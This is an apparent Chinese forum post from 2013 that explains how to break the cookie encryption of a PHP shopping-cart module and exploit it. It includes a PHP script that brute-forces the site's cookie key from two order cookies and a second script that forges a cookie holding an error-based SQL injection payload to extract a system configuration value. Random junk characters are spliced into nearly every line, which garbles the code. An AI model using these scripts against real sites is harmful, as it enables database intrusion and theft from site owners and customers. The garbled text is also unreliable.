www.xxx.com/plus/search.php?keyword=
9 Q/ |# @$ I: p, X4 H+ B1 M3 {在 include/shopcar.class.php中( r. z+ N3 u. W: }: g
先看一下这个shopcar类是如何生成cookie的# p; \$ A4 y% Y0 o$ T
239 function saveCookie($key,$value)( d* B9 ]6 U; X' f
240 {
0 M% C; L: I4 H5 Z4 I7 c& K" p2 J241 if(is_array($value))! D, u. B6 N+ w5 Z4 ^
242 {
3 C. B, J* b" e243 $value = $this->enCrypt($this->enCode($value));+ a5 p; ]* d" o$ }
244 }
0 {5 Y; O, T v, X' c" b! E. i245 else1 d. p8 X* g: d
246 {' h8 k2 m; M- b
247 $value = $this->enCrypt($value);6 `% |0 G6 O# P8 h+ o1 y0 _
248 }. m8 G8 h% D& q2 Q: i" ^
249 setcookie($key,$value,time()+36000,’/');
: ~" q! m) L5 C) v) K5 N250 }
# l) z: K& k: s2 ~/ R0 I V简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
! {( J( v) B+ q; M& o0 v: V186 function enCrypt($txt)
& f& @4 ^4 T* x) i+ E% L! t; n# W187 {, s4 ^6 s* h2 Q: X; c. Z
188 srand((double)microtime() * 1000000);6 ^$ i+ \; k% H/ p/ i: c0 e8 d
189 $encrypt_key = md5(rand(0, 32000));$ x H; M0 ]& G& k& S* C7 ^4 ~
190 $ctr = 0;
! W% \% H7 j; ~1 m4 K191 $tmp = ”;- x5 @+ }2 m. o8 s) L: }
192 for($i = 0; $i < strlen($txt); $i++)
' c3 P# l) M# L6 t6 d& u193 {
! j+ E- \' e* K; I- _" e" G' s194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
. G% `. L/ A) v# `195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
, t2 K6 e5 \& q2 T8 L* [! m196 }* H7 M' _9 j) }
197 return base64_encode($this->setKey($tmp));# _) a# Y2 e8 _' P) L
198 }9 D5 P- e* H9 B8 |+ a) }4 ]/ o& X
213 function setKey($txt)% J0 _- P0 V' n: u3 C2 `) i
214 {! h' i( L9 i1 d4 ]9 c: {
215 global $cfg_cookie_encode;
) j3 F; r$ `9 b0 g216 $encrypt_key = md5(strtolower($cfg_cookie_encode));! j8 l% J( @2 A6 Z
217 $ctr = 0;
( u& U* E; f, V! ^* z# y2 e' Q218 $tmp = ”;9 Y1 ~: }9 p+ k. M7 ]' C
219 for($i = 0; $i < strlen($txt); $i++)
, |- D& c. C" k# Q220 {
6 j0 d7 U; D3 w: t5 S221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;3 p2 e5 Q; T6 W0 m2 v) c# N
222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];$ [! J5 l; w7 t8 {% o8 S3 q4 Z
223 }
/ _ G+ C7 u7 a2 K8 L. V. Z224 return $tmp;
* D4 a- ^' M. D' q6 p225 }: e. Z9 h. y) w) o. K) z
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
+ S' Y9 S# @) Q0 _( l0 y D然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
+ a" h% r0 t( E( c1 u5 x具体代码如下:
9 Z. V4 t! T7 D& J" l<?php
9 N. W' J3 O5 g) g5 T2 h9 X5 N$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
0 d( q% Q y; }, P) E1 ~$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here+ _" i' I7 B. N$ W2 g* i
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
1 w8 Q! R' d. B& K6 L( afunction reStrCode($code,$string)8 w% n, s- b9 D$ Z7 k; T; e+ X S
{" Y& \; U5 O) k) }' m# [
$code = base64_decode($code);( @* c2 _$ W# p) r, N; e9 |
$key = “”;
) }: S. Q M8 W: N& |: Q( jfor($i=0 ; $i<32 ; $i++). ^( C/ r7 Y6 ~9 }4 I; d. P- H
{/ b8 W+ {, i+ M/ V1 |! y6 V' ], b0 i
$key .= $string[$i] ^ $code[$i];
/ @; q* E) ~; Y, o, F( t8 O6 }}" d% a4 i; b1 Z& _$ r
return $key;
' C1 _4 y& H4 Q M2 M s# H+ O: f0 N}
6 m3 f) c7 o; O# o7 i) j- Xfunction getKeys($cookie,$plantxt)
5 R, G/ B a3 z# e3 D{
/ o5 m; v+ f: Y0 t9 a/ m$tmp = $cookie;
9 W, v0 t6 @+ ?) n, x$results = array();% w5 C5 w$ q1 S/ n
for($j=0 ; $j < 32000; $j++)
( K5 v& @, `2 K+ T+ @{. ]% x0 ~! S* K
& Q3 U7 K* _; {
$txt = $plantxt;( u( y" [7 c( ?' h2 o8 e8 z3 L
$ctr = 0;* j3 V( Q1 y# q9 b* e/ v4 x. a' `
$tmp = ”;( U: y: f4 c+ S, ^" i/ A
$encrypt_key = md5($j);9 g. o; C/ w% @7 t8 g2 Q
for($i =0; $i < strlen($txt); $i ++)
5 V3 m5 W; O7 G+ B' [; m. N# s' ?{- T) C# Y: \' O
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
3 ~5 P1 W$ ~' J8 ?) F$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
; i8 R1 L2 @' p/ B) E6 F}
$ k G- I& E! `: l$string = $tmp;# F4 Q' g$ t+ B- ]. Z
$code = $cookie;" |2 D4 J1 n1 K9 T( ?2 ?+ H& j: L
$result = reStrCode($code,$string);$ k6 i3 K3 m" G) G6 W
if(eregi(‘^[a-z0-9]+$’,$result))/ b$ G; o2 F- R: `( u( ^ g# Q) K
{9 Z/ \, ]# A( W' ]: G
echo $result.”\n”;
' S# j: d# e: ]$results[] = $result;
7 {& c' N: j0 M1 O% t}# N; F8 M$ F9 E( S7 e/ E) p* ~7 M2 W
}9 b. B1 l: s4 B3 o! D
return $results;1 ?2 A' |* l. N7 k6 S* E# ]
}
/ t9 `% C; J* U3 A& v$results1 = getKeys($cookie1,$plantxt);
5 \6 B9 u: m+ P" f V$results2 = getKeys($cookie2,$plantxt);
( F: V+ ?+ P7 r" j3 Eprint “\n——————–real key————————–\n”;
2 R3 A2 Q. a& m/ r5 c& sforeach($results1 as $test1)" w# p2 w5 _% r) J. r* a
{7 l- Y+ _" t2 E% @) p0 o5 P5 Z" v/ q
foreach($results2 as $test2)
# W6 f, _% s! Y; Z% L# Q. a: Q{+ r. g% I; J6 b
if($test1 == $test2)( y: }, v4 P2 \& |; z: ^1 L
{
# Z2 b& R1 K) e1 J5 pecho $test1.”\n”;
$ R# Q3 G! D* |! Z}
+ \: S3 F: J7 u0 d& d}
' B3 f$ T% W. c% t) j6 W$ g}
4 I- P/ I8 o m% H?>
0 L" g5 N. m# H& @/ x+ }cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,& T# f0 D4 q$ |" y& K$ G
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1) h3 Q; F0 a0 P' P1 g
然后推算出md5(strtolower($cfg_cookie_encode))
6 y- [. w% C$ l8 n得到这个key之后,我们就可以构造任意购物车的cookie
5 ^1 e8 c+ P5 G* V接着看' I& ~ A- K- E: ~: `: C- X( w
20 class MemberShops$ v1 r$ H H2 v, e2 c& e" J" Z
21 {
) J7 B {4 [7 B22 var $OrdersId;9 y* v( K( x8 C* s2 H* E
23 var $productsId;
: @# q5 Q0 \3 q5 R. K0 t2 t24
8 L( |7 N# B$ j6 Q2 r' Y25 function __construct()% P4 @2 o4 q$ v
26 {: D7 x- k/ M+ ^; y+ ]& w" q
27 $this->OrdersId = $this->getCookie(“OrdersId”);/ o; w3 z, a8 w& m9 k6 s4 e- T
28 if(empty($this->OrdersId))
! _# l# q1 j5 |+ `& w29 {# M3 u( A0 L) N3 R
30 $this->OrdersId = $this->MakeOrders();' G: m7 R2 Y. c8 x' { n
31 }, `. [% \9 }/ H3 V3 _5 {6 {
32 }
; u' ` p, p+ g8 }8 i4 h- A发现OrderId是从cookie里面获取的& t% H* M0 X0 i' n+ b
然后& A! A5 X! H3 p g1 a Z1 X3 O+ W
/plus/carbuyaction.php中的
7 g: t& O; B r2 L8 A5 v9 I29 $cart = new MemberShops();' n7 e% h) Y- i$ J
39 $OrdersId = $cart->OrdersId; //本次记录的订单号+ w, R/ x6 S% u; Y& }
……$ W' ]7 ]+ x5 K1 [+ p& _+ R, k/ m
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
1 \0 f U, m, q8 \6 s: L* i接着我们就可以注入了
, C" J- r6 z9 H: R) O通过利用下面代码生成cookie:: l) m* G" T1 i5 l( `
<?php
" j$ x2 P& \4 p" l# w2 A$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
5 T. i H! ]+ H' x' h" N( J$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here( \2 L2 X+ X7 S9 Z
function setKey($txt)
# [) N/ r: f6 J{: d, O( u9 [8 O, j
global $encrypt_key;
) o- T' f' X8 Z2 ^# [' X: X8 q$ctr = 0;
$ ~0 S0 f& P6 V9 ]$tmp = ”;/ D2 E0 Y% ], I6 h7 X1 f* {% C
for($i = 0; $i < strlen($txt); $i++)6 f% O. h- Z/ Z8 o+ f( ~/ l% S$ W/ E
{
: |5 e: V7 _- J# C$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;# }5 L+ w$ f' w
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
+ C0 R7 J3 K! q. x4 ^}
& z2 Y+ h; [- e$ o |# c& preturn $tmp;
! u) ]1 f1 g$ Q+ P& ^+ z2 T6 }}1 u- r/ b/ ~' @9 J
function enCrypt($txt)# x% O7 R$ @) r6 ]6 F3 H
{
( L, G/ q9 t, [0 X2 X% tsrand((double)microtime() * 1000000);7 E- c* f1 J+ E7 q4 x/ `3 W9 ?% ?( {
$encrypt_key = md5(rand(0, 32000));
8 R. B/ Z( B8 F/ B$ M$ctr = 0;
" l0 F8 i! F, D } ]$tmp = ”;
( Z. J. }% V1 ?2 ]7 W" X Q+ Lfor($i = 0; $i < strlen($txt); $i++)% L, e X; ?. B1 R, d
{ _% f! l$ C' [# I; C. g7 [
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( I% m4 L, [3 y" X9 m3 U
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
$ b2 n( n, H* C8 F6 _, J}& v' A: r: T. W9 d' l% u# M, D# w: @2 l
return base64_encode(setKey($tmp));
2 H, L! `# V. ~5 s z}6 d5 H: k/ _; {0 U2 a. K% B- q
for($dest =0;$dest = enCrypt($txt);)/ d/ Y9 s/ p# O. F5 t s( Q3 v+ v9 ^
{( X* T* H ]0 `- j: [
if(!strpos($dest,’+'))
, `5 |9 d8 m2 \; `2 k{
; @: \/ }, j' r; \/ v9 Ebreak;/ {4 O9 G5 b3 _- t
}
& t) S) r4 h+ Z' t( ?6 I) q, R( D}# w" t, y0 @4 Q, Q; c- A
echo $dest.”\n”; [# Y D% V% {- y+ D- j9 f
?>& U z0 V6 \ Y+ p$ o3 U$ U
% A2 p% m# D" k; s( E |
发表于 2013-2-13 23:58:29
收藏
支持
反对